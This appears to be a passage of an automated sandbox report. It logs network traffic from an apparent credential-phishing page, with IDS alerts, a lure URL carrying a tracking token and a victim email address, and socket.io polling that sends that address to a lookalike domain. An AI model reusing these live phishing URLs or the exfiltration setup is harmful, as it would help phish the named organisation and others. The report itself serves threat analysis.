            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49797 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49863 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49877 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49918 -> 104.21.70.232:443
            Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.5:49852 -> 104.21.70.232:443
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 208.89.73.27
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
            Source: unknownTCP traffic detected without corresponding DNS query: 23.44.203.68
            Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.227
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1Host: www.oyabarista.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /files/images/Logo.png HTTP/1.1Host: www.oyabarista.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveOrigin: https://www.oyabarista.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.oyabarista.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.oyabarista.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.oyabarista.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNraPW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: ZtPFtoZ2x84UMtBW0Hft2g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNraPW HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrbOF HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: LFQPQHRj3K0Cy0BCzE3u+A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrbOF HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrcEg HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 6rSjHvMBQUC+Jb69+3Yxqw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrcEg HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrc-m HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: /O64MXq9NSX1GjEUOYIrXg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrc-m HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrdm- HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveAuth_UID: USER04032025U29030403Session_Email: info@kostal.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://www.oyabarista.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.oyabarista.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1Host: mssnet0nses.clickConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://www.oyabarista.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 5jfX6saXYEEcvpXSeai5fA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=PNNrdm- HTTP/1.1Host: mssnet0nses.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
